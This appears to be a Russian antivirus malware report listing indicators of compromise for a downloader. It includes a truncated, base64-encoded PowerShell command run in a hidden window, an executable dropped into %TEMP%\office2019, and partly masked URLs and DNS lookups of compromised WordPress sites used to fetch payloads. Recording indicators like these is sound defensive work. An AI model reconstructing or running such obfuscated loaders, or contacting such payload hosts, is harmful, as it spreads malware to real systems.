Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHIAdwBmAHUANgBmAD0AKAAnAEYAbwAnACsAJwA4AGkAJwArACcANQB4AHAAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgBUAEUATQBQAFwAbwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\bnpsn2cf.exe
- %TEMP%\office2019\bnpsn2cf.exe
- http://sw####ommerce.com/wp-content/uploads/2015/f9K/
- http://is###ickens.com/wp-admin/p/
- http://bi###uepay.com/wp-content/qzQ/
- http://bi###uepay.com/index.php/wp-content/qzQ
- http://pe###rols.eu/blog/BHu/
- DNS ASK sw####ommerce.com
- DNS ASK tr####.#onlinedating.com
- DNS ASK is###ickens.com
- DNS ASK la###nhome.com
- DNS ASK ld###.#amemorefun.net
- DNS ASK bi###uepay.com
- DNS ASK pe###rols.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHIAdwBmAHUANgBmAD0AKAAnAEYAbwAnACsAJwA4AGkAJwArACcANQB4AHAAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgBUAEUATQBQAFwAbwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)